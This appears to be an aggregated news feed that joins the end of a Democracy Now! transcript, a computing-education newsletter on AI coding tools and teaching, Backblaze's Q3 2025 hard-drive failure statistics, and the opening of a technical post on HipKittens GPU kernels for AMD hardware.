JUAN GONZÁLEZ: Yes, it’s a clear continued policy of the United States to control oil production as much as it can as the Trump administration continues on this crazy, bizarre attempt to corner as much oil supply as they can as it continues to deny the existence of climate change or the climate catastrophe we face.

AMY GOODMAN : Well, coming up, “You’ve Arrived in Hell,” a new Human Rights Watch report, details how Venezuelans, sent by the U.S. to El Salvador’s CECOT mega prison, were tortured and abused. Juan Pappier will stay with us. We hope you do, too.

[break]

AMY GOODMAN : “Contra Todo (Against Everything)” by iLe, performing in our Democracy Now! studio.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Don't turn your brain off

Hacker News
computingeducationthings.substack.com
2025-11-14 13:12:11
Comments...
Original Article

Chris Lattner created some of the most influential programming languages and compiled technologies of the past 20 years. He is the creator of LLVM , used by languages like Swift , Rust , and C++ , created the Swift programming language, worked on TensorFlow , and now works on the Mojo programming language . In this conversation, they cover the origin story of LLVM and how Chris managed to convince Apple to move all major Apple dev tools over to support this new technology, how Chris created Swift at Apple, including how they worked on this new language in secrecy for a year and a half, and why Mojo is a language Chris expects to help build efficient AI programs easier and faster, how Chris uses AI tools, and what productivity improvements he sees as a very experienced programmer, and many more. If you’d like to understand how a truly standout software engineer like Chris thinks and gets things done, and how he’s designing a language that could be a very important part of AI engineering, then this episode is for you.

Chris Lattner encourages his team to use AI coding tools like Claude Code and Cursor. For experienced programmers like himself, these tools provide about 10% productivity gains, mainly by handling mechanical rewrites and reducing tedious work, which increases both productivity and coding enjoyment.

However, the impact varies significantly by use case. For PMs and prototypers building wireframes, AI tools are transformative—enabling 10x productivity improvements on tasks that might not otherwise get done. But for production coding, results are mixed. Sometimes AI agents spend excessive time and tokens on problems a human could solve faster directly.

His key concern: programmers must keep their brains engaged. AI should be a “human assist, not a human replacement.” For production applications, developers need to review code, understand architecture, and maintain deep system knowledge. What he cares about most is keeping production architecture clean and well-curated—it doesn’t need to be perfect, but it needs human oversight. AI coding tools can go crazy, duplicating code in different places, which creates maintenance nightmares when you update two out of three instances and introduce bugs. “Vibe coding” (letting AI handle everything) is risky—not just for jobs, but because it makes future architectural changes nearly impossible when no one understands how the system works. As Chris puts it: “The tools are amazing, but they still need adult supervision.” Keeping humans in the loop is essential for security, performance, and long-term maintainability.

Chris Lattner’s team hires two types of people: super-specialized experts (compiler nerds, GPU programmers with 10+ years of experience) and people fresh out of school . He finds early-career hires particularly exciting because “they haven’t learned all the bad things yet.”

For early-career candidates, he looks for intellectual curiosity and hunger—people who haven’t given up to “AI will do everything for me.” He wants fearless individuals willing to tackle things that sound terrifying or “impossible and doomed to failure” with a “how hard can it be? Let’s figure it out” attitude. Hard work and persistence are essential in the rapidly changing AI space where many people freeze up instead of adapting.

He particularly values open source contributions, which he considers the best way to prove you can write code and work with a team—a huge part of real software engineering. Internships and hands-on experience also matter. During conversations, he can tell when candidates are genuinely excited about what they do versus just “performatively going through the motions.”

His interview philosophy emphasizes letting candidates use their native tools, including AI coding assistants for mechanical tasks. Making people code on whiteboards without their normal tools would be “very strange” today. He also recognizes that nervousness affects performance, so creating a comfortable environment matters.

Chris Lattner argues that with AI making code writing easier than ever, the focus should shift to code readability , not optimizing for LLMs. Code has always been read more often than it’s written, and that hasn’t changed.

For him, great programming languages need two things in balance: expressivity (can you express the full power of the hardware?) and readability (can you understand the code and build scalable abstractions?). JavaScript can’t write efficient GPU kernels because it lacks expressivity. Assembly code has full expressivity but no readability. The sweet spot is the intersection of both.

This is why Mojo embraces Python’s syntax—it’s widely known and easy to read—while replacing Python’s entire implementation to unlock full hardware performance. He believes LLMs will continue improving at handling any language quirks, and they’re already an amazing way to learn new languages.

His advice for making code LLM-friendly? Make it human-friendly first. Better error messages for humans are better for agents too. The most important thing for LLM-based coding is having massive amounts of open source code—Modular’s repo has 700,000 lines of Mojo code, complete with full history, giving LLMs a huge dataset to learn from.

On why compilers are cool: unlike other university classes where you “build a thing, turn it in, throw it away,” compiler courses teach iterative development. You build a lexer, then a parser on top of it, then a type checker, and keep building higher. If you make mistakes, you must go back and fix them—mirroring real software development. Today it’s easier than ever to learn compilers through resources like LLVM’s Kaleidoscope Tutorial and the Rust community. While not everyone needs to become a compiler engineer, the field deserves more credit and offers great career opportunities.

He also believes we’ve reached a point where we’re operating at a new higher level of abstraction, as other authors have noted as well, with software engineers acting as supervisors of AI agents: reviewing, editing, and debugging AI-generated code. He also points out that for a long time, syntax and the high rigidity of programming had become barriers to entering the CS field, and GenAI is now democratizing access. It’s true that we’re seeing many more people doing some form of programming.

Now, this lower barrier to entry introduces new teaching approaches for more diverse students — I’m thinking about those non-computing students interested in creating apps or websites for fun, for example, and teaching them the architectural implications of those websites. Clearly, within the CS major, the increasingly common opinion is that AI is a productivity booster for experts, and the results for novices are still unclear. As I’ve said several times in this newsletter, it’s essential to understand what we’re doing under the hood for various reasons, such as social factors, performance, and security.

Juho reminds us that companies will hire students who know more about AI, but not if they over-rely on it. One question that comes up is how we can motivate students to learn programming if there’s a tool that does it for them and banning it simply isn’t an option.

Finally, he talks about a challenge that I’m not fully convinced is 100% true — based on what several senior engineers have been saying over the past few months — but it does make sense: seniors are slowing down junior hiring because now they can use AI to handle tasks they would have previously delegated. He says this is a danger to workforce diversity.

As always, Juho makes good points. I recommend following him on LinkedIn and on Google Scholar so you don’t miss his upcoming papers — and his previous ones, which are closely related to all of this.

Historically, to get a job in the tech industry, you needed a CS degree. CS is not considered to be an easy major. It is often multiple years of intense training across a variety of technical and mathematical topics. Now, what has made getting CS education more complicated, just like we’ve seen in so many other parts of the industry, is the rise of AI agents. As a student, how do you learn critical thinking and problem solving when you’re just a few keystrokes away from talking to an AI agent who will not only answer the question for you, but also give you a very detailed rundown of why things work the way they do? And so, taking a step back and looking even broader, is there even value in the future for a CS education when, like many people predict, an AI agent can increasingly be more capable at building very complex systems with very little technical know-how needed by the human in the loop?

I loved this conversation between Kirupa Chinnathambi and Elisa Cundiff .

What struck me most was:

Kirupa on entering the teaching profession (similar feelings here):

Teaching allows us to share real-world insights that students can truly benefit from. Kirupa believes that if we can simplify complicated topics and make them understandable, it proves we genuinely understand the subject—we know what matters, what doesn’t, and what can wait until day five or day ten, rather than overwhelming students with everything on day one. For him, teaching helps him stay relevant as part of his work.

Elisa Cundiff on access to information:

Current paradox: while students have better educational tools than ever before, they face the problem of not knowing what to learn or which resources to use among thousands of available options. Having access doesn’t guarantee direction.

Kirupa on struggle and sequential learning:

In the past, the scarcity of resources forced sequential and gradual learning (starting with basic HTML, then inline colors, understanding hex codes...). This process of “noodling” or struggling with basic problems generated a deep understanding of why things work. Today, with so many resources available, students never spend enough time struggling with the most basic problems, which can prevent them from developing a true appreciation of the fundamentals.

Elisa Cundiff on fundamentals in the ChatGPT era:

After the initial panic about chatbots (is it the new calculator/Wikipedia?), the emerging consensus among educators is that students must learn the fundamentals first. Without understanding the underlying concepts, they can’t audit AI code for correctness, security, maintainability, or efficiency, nor debug it. Once they master the fundamentals, then they should be introduced to AI tools to speed up their work before graduating.

Kirupa on critical thinking through struggle:

One of the best ways to develop critical thinking is through making mistakes and learning from them—breaking down questions into sub-questions and figuring out answers through trial and error. In the past, there was no Plan B when learning programming; you had to struggle through problems. If no one on Yahoo, Lycos, or Excite had the answer, you figured it out yourself through experimentation. This struggle created retention because you spent so much time learning what didn’t work before discovering what did. Today, everyone has a Plan B just five seconds away: copy-paste into a chatbot that provides a 90-99% accurate answer with an explanation. Students aren’t exploring on their own anymore—they’re just reading from the screen, memorizing rather than experiencing the struggle of true learning.

Elisa Cundiff on the illusion of learning:

Students face the illusion of having accomplished something. In her intro Python course (which counts as arts and humanities), 25% of the grade comes from writing—where she first saw widespread AI-generated essay cheating. When she talked to 35 students last fall, most acknowledged they weren’t getting anything from it and recognized the essays weren’t theirs. They kept saying “it’s too easy”—in moments of panic, they think turning something in is better than nothing. Cheating used to be harder. Most students recognize the speed-accuracy tradeoff isn’t resulting in cognitive development.

Elisa on fundamentals and critical thinking:

No matter what the future holds, students need to be critical thinkers. Learning basic programming concepts are little puzzles that help them learn to think. These can be made fun and are worth keeping—not only to build foundational understanding, but to develop critical thinking skills.

The conversation concludes with reflections on AI’s impact on education, comparing it to past disruptions like the internet, Wikipedia, and MOOCs. Elisa emphasizes that the educator’s role as curator becomes even more important— providing structure, end goals, and curated learning environments in a world of overwhelming information . Derek Muller’s point is referenced: each generation predicted education’s destruction (internet in the 90s, Wikipedia in the 2000s, MOOCs), but education persists because students need structured, joyful guidance that answers the “why” and builds skills . Kirupa expresses uncertainty about his own teaching role’s future value, questioning whether what he teaches will meaningfully impact students when AI provides quick answers. Both acknowledge the unprecedented uncertainty students face and the challenge of preparing them for an unknowable future.

For me, being a good educator means being a good communicator. Storytelling is a big part of teaching. This week I was listening to Fernandisco , who is a legend in Spanish music radio. He’s currently a host/DJ on the music station Los 40 Classic and directs a music magazine show in prime time. He’s a tastemaker—one of those people who filter through the avalanche of available music to help us discover—or rediscover—all the great work being done.

Here’s what I learned from him in this episode:

On being a good communicator:

For me, every day is something very special because the person listening to you comes back to you because you are part of the emotion they’ve been building throughout their lives. And it’s a daily miracle. Radio isn’t something where every five days you need to do a good show. You have to do it every day because people deserve the best.

On the algorithm:

When you’re listening to me in the morning, you know that I am the algorithm—that’s the difference. The music I’m going to play for you, I know is good, and it’s music people want to hear explained by a storyteller.

This one by Stuart Russell and Peter Norvig is perhaps the go-to book when you want an overview of AI. Here it is in web format .

Chip Huyen’s books have received excellent reviews.

And for machine learning , I’d recommend this one —especially for reviewing the mathematical foundations behind it.

If you’re looking for something concise and enjoyable, ideal for entering the world of ML, I’d probably recommend Andriy Burkov’s book .

As for deep learning, this introduction has been well received in both academia and industry.

Following on from last week’s topic, Matt Pocock on how he uses Claude Code in his programming workflow.

Laurie Gale from the Raspberry Pi Foundation has been exploring the use of PRIMM alongside debugging. He’s been developing an amazing online tool/environment that almost forces learners to interact with code and suggest ideas, debug and solve the issues.

This is a very useful instructional resource with interactive exercises for getting novice students to practice Java and Python. The exercises in section 10 are especially interesting to me.

Enjoyed this technical conversation on autonomous driving on the Google DeepMind podcast a lot. It’s worth a listen!

Survey on how CS1 instructors perceive programming quality.

The Computer Research Association (CRA) is interested in the professional development of students in the field of computing. Since you are probably no longer a grad student, you can encourage your students to complete this survey . Any contribution provides valuable information for future students who are considering this amazing field of computing.

CCSCNE 2026 Submission Reminder: Conference website .

Call for Submissions : Innovations and Opportunities in Liberal Arts Computing Education (SIGCSE 2026).

Deadline Changed to Nov 16 AoE for the SIGAI Innovative AI Education Program .

ICER 2026 Call for Papers: Abstracts 20th Feb, Papers 27th Feb.

Register now for the next free ACM TechTalk, “A Look at AI Security with Mark Russinovich,” presented on Wednesday, December 3 at 1:00 PM ET/18:00 UTC by Mark Russinovich, CTO, Deputy CISO, and Technical Fellow for Microsoft Azure. Scott Hanselman, Vice President of Developer Community at Microsoft and member of the ACM Practitioner Board, will moderate the questions and answers session.

CSUN seeks tenure-track Assistant Professor in Computer Science with expertise in areas like Cloud Computing, Cybersecurity, AI, or related fields, to teach undergraduate/graduate courses and contribute to equitable student outcomes through teaching, research, and service.

This post from Josh Brake on the FDE concept was a good read. I agree with Josh that every challenge is an opportunity for innovation. Check out the interesting apps some educators are developing to create new ways for students to engage in new and meaningful learning opportunities. This mindset of a Forward Deployed Educator offers one of those fruitful directions.

I’m thinking here about the kind of interactive visualizations that can often be a very useful tool for helping students to build intuition about a concept, and enable them to engage in curious play. It’s interactive single-page web apps that help students to test their knowledge on assembly and machine language in my digital design and computer engineering class. It’s a custom multitasking simulator to help students visualize how different scheduling algorithms perform and impact the performance and context switching overhead in a real-time operating system. Now, instead of being frustrated with the limitations and constraints of existing tools that don’t do quite what you want or the insurmountable time investment required to build a small tool to illustrate a concept in a single lesson, you can get to a serviceable demo in only a few prompts.

Earlier this year, my friend Punya Mishra shared a Unit Circle Demo that he mocked up with GPT-o1 to show the connection between sines, cosines, and the unit circle. In a post a month later, he mused how even incorrect simulations can be used to help push students to be more curious and to develop healthy skepticism. Just yesterday, Lance Cummings wrote about the Writing Gym Tracker app that he built to help his students build their writing practices. In the before times, you’d have to live with the limitations or bugs in another developers app, bugging them to fix or add the features you want. Now you can just build and deploy your own with a few prompts.

This by OpenAI is a great read :

Even among top models, performance varies significantly by task.

Ethan Mollick raises a very true point this week:

Anyone who wants to use AI seriously for real work will need to assess it themselves.

I strongly agree with this . The author is Senén Barro , who teaches at the University of Santiago de Compostela (Spain):

I’ve mentioned before that since ChatGPT came out, my students barely use office hours anymore. That said, I hope that with these new tools designed specifically for them, they won’t stop coming to class. Either way, if they do stop coming, it’ll be more my fault than AI’s. These tools, at least for now, aren’t free from hallucinations, incorrect or poorly structured explanations, and while they’ve read everything, they haven’t experienced anything—which means they’re unaware of many aspects of the real world that go far beyond the world described in texts—what we might call the written world.

As I’ve mentioned before here and here :

Either I, as a professor, know how to offer more than these tools do, or my students are honestly wasting their time with me.

My co-advisor Michael wrote in the NYT about the shift from coding to supervising AI-generated code:

The essential skill is no longer simply writing programs but learning to read, understand, critique and improve them instead. The future of computer science education is to teach students how to master the indispensable skill of supervision.

Most education doesn’t yet emphasize the skills critical for programming supervision — which hinges on understanding the strengths and limitations of A.I. tools.

Changing what we teach means rethinking how we teach it. Educators are experimenting with ways to help students use A.I. as a learning partner rather than a shortcut.

The rise of generative A.I. should sharpen, not distract, our focus on what truly matters in computer science education: helping students develop the habits of mind that let them question, reason and apply judgment in a rapidly evolving field.

James Prather is presenting our work today in Koli ! You can also find our paper in the ACM proceedings .

Excited to hear Binoy Ravindran from Virginia Tech in our next Monday’s CS graduate seminars. Binoy leads the Systems Software Research Group at VT. If you’re in Houston, it would be great if you could join us. Here is the link to the event if you’re interested in coming.

First NCAAB game in the US and it was AMAZING! Houston crushed Towson 65-48 with Kingston Flemings dropping 20 points for the MVP. That stadium energy was UNREAL. But the real MVP? Persian food before the game with the best company (protip: always go with real Iranians). Go Coogs!

Nothing like a coffee and good conversation with Luke on campus. Friendships that started at the Newman and continue to grow.

Personal achievement: I passed my US driving test yesterday! I’m so happy about it.

This week I’ve been listening on repeat to Viva Suecia’s wonderful new album.

The most extraordinary thing in the world is an ordinary man and an ordinary woman and their ordinary children.

― G.K. Chesterton

That's all for this week. Thank you for your time. I value your feedback, as well as your suggestions for future editions. I look forward to hearing from you in the comments.

Backblaze Drive Stats for Q3 2025

Hacker News
www.backblaze.com
2025-11-14 13:10:19
Comments...
Original Article
An illustration of chart bars with the words Backblaze S3 2025 Drive Stats overlaid

Every quarter, Drive Stats gives us the numbers. This quarter, it gave us a crisis of meaning. What does it really mean for a hard drive to fail? Is it the moment the lights go out, or the moment we decide they have? Philosophers might call that an ontological gray area. We just call it Q3.

As of June 30, 2025, we had 332,915 drives under management. Of that total, there were 3,970 boot drives and 328,348 data drives. Let’s dig into our stats, then talk about the meaning of failure.

This quarter, we have more to talk about (Stats-wise)

Drive Stats was the beginning. Want to see more of the full picture? Check out the Stats Lab webinar, bringing together content from all of our Stats articles. We’re going to chat about all things Backblaze (and beyond)—by the numbers.

Save My Seat

Drive Stats: The digest version

An infographic of Backblaze Drive Stats Q3 2025 data

Q3 2025 hard drive failure rates

During Q3 2025, we were tracking 328,348 storage drives. Here are the numbers:

Backblaze Hard Drive Failure Rates for Q3 2025

Reporting period July 1, 2025–September 30, 2025 inclusive
Drive models with drive count > 100 as of July 1, 2025 and drive days > 10,000 in Q3 2025

An image of a chart showing annualized failure rates for drive models in the Backblaze hard drive fleet

Notes and observations

  • The failure rate has increased: The failure rate has changed, and by quite a bit. As a reminder, last quarter’s AFR was 1.36% compared with this quarter’s 1.55%. (Interestingly, the 2024 yearly AFR was 1.57%.)
  • That new drive energy: Say hello to the 24TB Toshiba MG11ACA24TE, joining the drive pool with 2,400 drives and 24,148 drive days. That means that we’ve hit the thresholds for the quarterly stats, but not the lifetime.
  • The zero failure club: It was a big month for the zero failure club, with four drives making the cut:
    • Seagate HMS5C4040BLE640 (4TB)
    • Seagate ST8000NM000A (8TB)
    • Toshiba MG09ACA16TE (16TB)
    • Toshiba MG11ACA24TE (24TB)—and yes, that’s the new drive.

For those of you tracking the stats closely, you’ll notice that the Seagate ST8000NM000A (8TB) is a frequent flier on this list. The last time it had a failure was in Q3 2024 —and it was just a single failure for the whole quarter!

  • The highest AFRs were really high: The high end was so high that this month, it inspired us to run an outlier analysis using the standard quartile analysis (Tukey method). Based on that information, any drive with a quarterly AFR higher than 5.88% is an outlier, and there are three:
    • Seagate ST10000NM0086 (10TB): 7.97%
    • Seagate ST14000NM0138 (14TB): 6.86%
    • Toshiba MG08ACA16TEY (16TB): 16.95%

What’s going on there? Great question, and we’ll get into that after the lifetime failure rates.

Lifetime hard drive failure rates

To be considered for the lifetime review, a drive model was required to have 500 or more drives as of the end of Q2 2025 and have over 100,000 accumulated drive days during their lifetime. When we removed those drive models which did not meet the lifetime criteria, we had drives grouped into 27 models remaining for analysis as shown in the table below.

Backblaze Hard Drive Failure Rates for Q2 2025

A table of lifetime failure rates of Backblaze's drive fleet.

Notes and observations

  • That lifetime AFR is pretty consistent, isn’t it? The lifetime AFR is 1.31%. Last quarter we reported that it was 1.30%, and the quarter before that, it was 1.31%.
  • The 4TB average age hasn’t shifted: As we’ve reported on previously, the 4TB drives are being decommissioned over time. Now, we’re down to just a handful left—just 11 of the ALE models and 187 of the BLE models. But, because their lifetime populations are so comparatively large, the additional drive days aren’t enough to move the needle on the average age in months. So, no ghosts in the machine here, and decommissioning is proceeding as planned.
  • Steady uptick in higher capacity drives : Of the 20TB+ drives that meet our lifetime data parameters, we’ve added 7,936 since last quarter. And, don’t forget that our newest entrée to the cohort, the Toshiba MG11ACA24TE (24TB), hasn’t made its way to this table yet—that adds an additional 2,400 drive models. All together, the 20TB+ club represents 67,939 drives, or about 21% of the drive pool.

Defining a failure—from a technical perspective

A question that’s come up a few times when we’re hosting a webinar or chatting in the comments section is how we define a failure. While it may seem intuitive, it’s actually something of a meaty conundrum, and something we haven’t addressed since the early days of this series. Tracking down the answer to this question touches internal drive fleet monitoring tools (via SMART stats), the actual Drive Stats collection program, and our data engineering layer. I’ll dig into each of these in detail, then we’ll take a look at the outliers for this quarter.

SMART stats reporting

We use Smartmontools to collect the SMART attributes of drives, and another monitoring tool called drive sentinel to flag read/write errors that exceed a certain threshold as well as some other anomalies.

The main indicator we use for determining if a drive should be replaced is when it responds to reads with uncorrectable medium errors. When a drive reads the data from the disk, but the data fails its integrity check, the drive will try to reconstruct the data using internal error correction codes. If it is unable to reconstruct the data, it notifies the host by reporting it as an uncorrectable error and marks that part of the disk as pending reallocation, which shows up in SMART under an attribute like Current_Pending_Sector .

On Storage Pods that control drives through SATA links, the drive sentinel will count the number of these uncorrectable errors a drive reports and if it exceeds a threshold, access to the drive will be removed. This is important in the classic Backblaze Storage Pods where five drives share a single SATA link and errors by one drive will affect all drives on the link.

On Dell and SMCI pods that use a SAS topology to connect drives, drive sentinel doesn’t remove access to drives because the errors are reported differently; but, that’s also not as critical since SAS minimizes the impact that a problem disk can have on others.

The Drive Stats program

We’ve talked about the custom program we use to collect Drive Stats in the past, and here’s a quick recap:

The podstats generator runs on every Storage Pod, what we call any host that holds customer data, every few minutes. It’s a C++ program that collects SMART stats and a few other attributes, then converts them into an .xml file (“podstats”). Those are then pushed to a central host in each datacenter and bundled. Once the data leaves these central hosts, it has entered the domain of what we will call Drive Stats.

For this program, the logic is relatively simple: A failure in Drive Stats occurs when a drive vanishes out of the reporting population. It is considered “failed” until it shows up again. Drives are tracked by serial number and we report daily logs on a per-drive basis, so truly, we can get pretty granular here.

The data engineering layer

To recap, we’ve collected our SMART stats and compiled them with the podstats program. Now we’ve got all the information, and data intelligence needs to add the context. A drive may go offline for a day or so (not return a response to those tools that collect daily logs of SMART stats), but it could be something as simple as a loose cable. So, time-wise, if a drive reappears after one day or 30, at what point in that period of time do we classify it as an official failure?

Previously, we manually cross-referenced data center work tickets, but these days, we’ve automated that process. On the backend, it’s a SQL query, but in human speak, this is what it comes down to:

  1. If a drive logs data on the last day of the selection period (which in this case is a quarter) then it has not failed.
  2. There are three human-curated tables that the query cross references. If a drive serial number appears on one of them, it tells us whether there’s a failure or not (depending on the table’s function).
  3. If the drive serial number is the primary serial number in a drive replacement Jira ticket then it has failed. (Jira is where we track our data center work tickets.)
  4. If the drive serial number is the target serial number in a clone Jira ticket or a (temp) replacement ticket, then it has not failed.

Basically, when we go to write the Drive Stats reports at the end of the quarter, if a drive has either appeared in one of our various work trackers or hasn’t re-entered the population, then it’s considered failed.

In rare instances, that can mean that we have so-called “cosmetic” failures when we have some work we’re doing on a drive model that lasts more than that quarterly collection period. And, spoiler, we have one of those instances that showed up in the data this month—our outlier Toshiba drive with the 16.9% failure rate. We’ll dig in in just a minute; but first, some context.

Connecting drive failure to overall picture of the drive pool

As we mentioned above, certain drives in the pool had such high swings in AFR that we ended up running an outlier analysis using the quartile method. (It’s also worth mentioning that a cluster analysis could potentially be a better fit, but we can save that for another day.) Based on that analysis, anything that has above a 5.88% failure rate is an outlier.

The primary motivation was inspired by an attempt to visualize the relationship between the age in months of a drive versus this quarter’s AFRs.

A scatter plot that shows the relationship between the age in months of a drive versus this quarter’s AFRs

And yes, we’re fully aware that that’s a… super unreadable scatter plot. Removing the labels, this is a bit better:

A scatter plot that shows the relationship between the age in months of a drive versus this quarter’s AFRs

We’re interested, really, in the shape of the relationship. If we posit that the older drives get, the higher their failure rates, you’d expect a larger concentration in the top right quadrant. But, our data follows a much more interesting pattern than that, with most of our data points concentrated in the lowest regions of the graph regardless of age—something you’d expect from a set of data that reflects a bunch of smart folks actively working towards the goal of a healthy drive population. And yet, we have some data points that break the mold.

As is pretty intuitive to my business intelligence folks in the audience, the process of identifying outliers is actionable data as well. Just like all press is good press; in our world, more data is more better. So, let’s take a closer look at those outliers. As a reminder, that’s these three drive models:

  • Seagate ST10000NM0086 (10TB): 7.97%
  • Seagate ST14000NM0138 (14TB): 6.86%
  • Toshiba MG08ACA16TEY (16TB): 16.95%

Seagate ST10000NM0086 (10TB)

This drive has some pretty explainable factors for the high failure rate. It’s well over seven years old (92.35 months). And, since it only has 1,018 drive models in operation, single failures hold a lot of weight compared with the average drive count per model—which comes in at 10,952 if you use the mean of this quarterly data and 6,177 if you use the median.

And, you can see that borne out in the trend in the last year of data:

A chart showing the failure rates for drive model Seagate-ST10000NM0086-10TB for the last year.

Seagate ST14000NM0138 (14TB)

This drive is nearing five years in age (56.57 months) and, again, has a lower drive count at 1,286. More importantly, this particular drive model has had historically high failure rates. In parallel with above, here’s the last year of quarterly failure rates:

A chart showing the failure rates for the drive model Seagate-ST14000NM0138-14TB for the last year.

Toshiba MG08ACA16TEY (16TB)

Finally, our Toshiba model is the most interesting of all. It’s less than four years old (44.61 months), and has 5,145 drives in the pool. And, this quarter is clearly a change from its normal, decent, AFRs.

A line graph of the Toshiba MG08ACA16TEY failure rates from Q3 2024 to Q3 2025

When we see deviations like this one, it’s usually an indication that there’s something afoot.

Never fear, Drive Stats fans; this was a known quantity before we went on this journey. This past quarter, working with Toshiba, we deployed some firmware updates they provided to optimize performance on these drives. Because we needed to pull drives to achieve this in some cases, we had an abnormal number of “failed” drives in this population.

What that means for this drive is that it’s actually not a bad drive model; and, given the ways we and Toshiba have worked together on a fix, we should see failure rates normalizing in the near future. And, this also goes back to our conversation of defining a failure—in this case, while the drives “failed,” the failure wasn’t mechanical and was based on something that we’ll be able to fix without replacing the drives. In short, don’t sweat the spike and pay attention to the long arc of performance on this population. We expect to see those drives happy and spinning for years to come (and with better performance, too).

The Hard Drive dataset (and beyond)

Thank you, as always, for making it through ~2,500 or so words to examine the fun side of data. Here’s our standard fine print:

The complete dataset used to create the tables and charts in this report is available on our Hard Drive Test Data page . You can download and use this data for free for your own purpose. All we ask are three things:

  1. You cite Backblaze as the source if you use the data;
  2. You accept that you are solely responsible for how you use the data, and;
  3. You do not sell this data itself to anyone; it is free.

If you’re a new Drive Stats fan, consider signing up for the newsletter . If you’re not ready for that kind of commitment, sound off in the comments section below or reach out directly to us to let us know what you’re working on. Happy investigating!

Meet the Backblaze Drive Stats team, and sign up for more newsletter happenings on the Drive Stats newsletter. Stephanie Doyle is the Writer and Blog Operations Specialist at Backblaze. She specializes in taking complex topics and writing relatable, engaging, and user-friendly content. You can most often find her reading in public places, and can connect with her on LinkedIn . Pat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn .

AMD GPUs go brrr

Lobsters
hazyresearch.stanford.edu
2025-11-14 13:07:11
Comments...
Original Article

Team : William Hu, Drew Wadsworth, Sean Siddens, Stanley Winata, Daniel Fu, Ryan Swann, Muhammad Osama, Christopher Ré, Simran Arora
Links : Arxiv | Code

AI is compute hungry . So we've been asking : How do we build AI from the hardware up? How do we lead AI developers to do what the hardware prefers?

AMD GPUs are now offering state-of-the-art speeds and feeds. However, this performance is locked away from AI workflows due to the lack of mature AMD software . We share HipKittens, an opinionated collection of programming primitives to help developers realize the hardware's capabilities: optimized register tiles, 8-wave and 4-wave kernel patterns instead of wave-specialization to schedule work within processors, and chiplet-optimized cache reuse patterns to schedule work across processors.

Checkout part one of this series for an intro to HipKittens and checkout this post for a technical deep dive.

What do AMD CDNA GPUs look like? A lay of the land.

An AMD MI355X GPU has 256 processors called “compute units” (CUs) and a CU contains four SIMDs. A SIMD has different execution units. A 64-thread “wave” (contrasting a 32-thread warp on NVIDIA) occupies a single SIMD. We show the MI355X memory hierarchy below.

Unsurprisingly, making AMD GPUs go brr boils down to keeping the “matrix cores” (tensor cores on NVIDIA) fed. There are a few differences in how we think about this hardware:

  1. What it's not. An MI355X has 70% the SRAM of a B200 (165KB instead of 228KB), lacks asynchronous matrix multiplication instructions that operate on inputs in shared or tensor memory (wgmma, tcgen05), lacks register reallocation (the ability for some waves to give their registers to others), lacks tensor memory acceleration (dedicated hardware for global memory access), and lacks first class mbarrier primitives (for fine-grained synchronization).
  2. What it is. On the other hand, AMD GPUs have a 2x larger register file per processor than the B200 and offers 60% more processors per GPU (256 compute units versus 160 streaming multiprocessors). AMD offers tiny and fine-grained matrix core instructions, while NVIDIA tensor cores instructions are generally called with large input operands. AMD has a TMA-like direct global to shared memory loads via buffer_load_dword \verb|buffer_load_dword| instructions, which bypass the register file.
  3. Towards chiplet architectures. AMD is also leading the charge in the shift from monolithic grids to chiplets. AMD splits the 256 processors into 8 chiplets called “XCDs” of 32 CUs. NVIDIA B200s include 2 chips. The AMD cache is disaggregated: an AMD XCD has a private L2 cache and there is an extra last level cache (LLC) that sits between the L2 and HBM memory.
Spec NVIDIA B200 SXM5 AMD MI355X OAM
BF16 matrix / tensor 2.2 PFLOPs 2.5 PFLOPs
MXFP8 matrix / tensor 4.5 PFLOPs 5.0 PFLOPs
MXFP6 matrix / tensor 4.5 PFLOPs 10.1 PFLOPs
MXFP4 matrix / tensor 9.0 PFLOPs 10.1 PFLOPs
Memory capacity 180 GB 288 GB
Memory bandwidth 8.0 TB/s 8.0 TB/s

Table 1: Hardware overview. Peak memory and compute speeds for the latest generation GPU platforms.

These differences impact the ways in which we design kernels on AMD.

  1. Optimized memory access: Of course this matters on NVIDIA, but AMD’s layouts, HIPCC compiler limitations, and (undocumented) quirky behaviors of different I/O instructions yields new challenges.
  2. Scheduling within processors: We need to rely on our register file and small matrix core instructions instead of shared memory and bulky wgmma/tcgen05 instructions to establish deep pipelines and hide memory costs. Wave specialization / producer consumer, which reigns supreme in NVIDIA kernels, is not the right answer on AMD.
  3. Scheduling across processors: We need to start thinking about NUMA effects at the cache level as we schedule work across thread blocks.

We walk through these three topics next.

HipKittens memory access patterns

As in ThunderKittens , in HK, developers program using tiles as the basic data structure. Tiles exist in shared or register memory, and are parametrized by a data type, size dimensions (a multiple of the matrix core instruction shape), and layout. HK provides a library of PyTorch-like functions that operate on tiles, for instance exp \verb|exp| , mma \verb|mma| , sub \verb|sub| , add \verb|add| , row_max \verb|row_max| compute ops and load, store memory ops. A tile is collectively owned by threads in a wave (warp). The functions use template metaprogramming to generalize to different input tiles and are lightweight, directly wrapping assembly (PTX, CDNA ISA) and C++.

A memory layout determines how data elements map to thread ownership. A matrix core instruction expects a particular register layout depending on the data type and instruction shape. We also want to maximize the granularity and coalescing of global memory loads. Between registers and HBM, shared memory is split into banks (4-byte regions) that can serve data simultaneously. If threads from a wave request data from the same bank at the same time, their accesses are serialized; efficient kernels use “swizzle patterns” to organize data in a way that avoids these bank conflicts.

A few challenges for memory access in HK include:

  • Register scheduling: A core tenant of HK and TK is to give developers full control over register allocation by remaining C++ embedded. Compilers like Triton prevent register management altogether, but surprisingly we find that even the HIPCC compiler imposes severe limitations (no wonder AMD uses raw assembly!). 1 For instance, 4-wave (1-wave per SIMD) kernels compiled via HIPCC cannot use data held in certain types of registers as inputs to matrix instructions. This motivated us to add explicit register scheduling to HK, where developers pin specific registers when creating registers tiles, effectively replacing the compiler’s register management capabilities. Developers thus have the control necessary to write peak performance kernels!
Learn more about explicit register scheduling

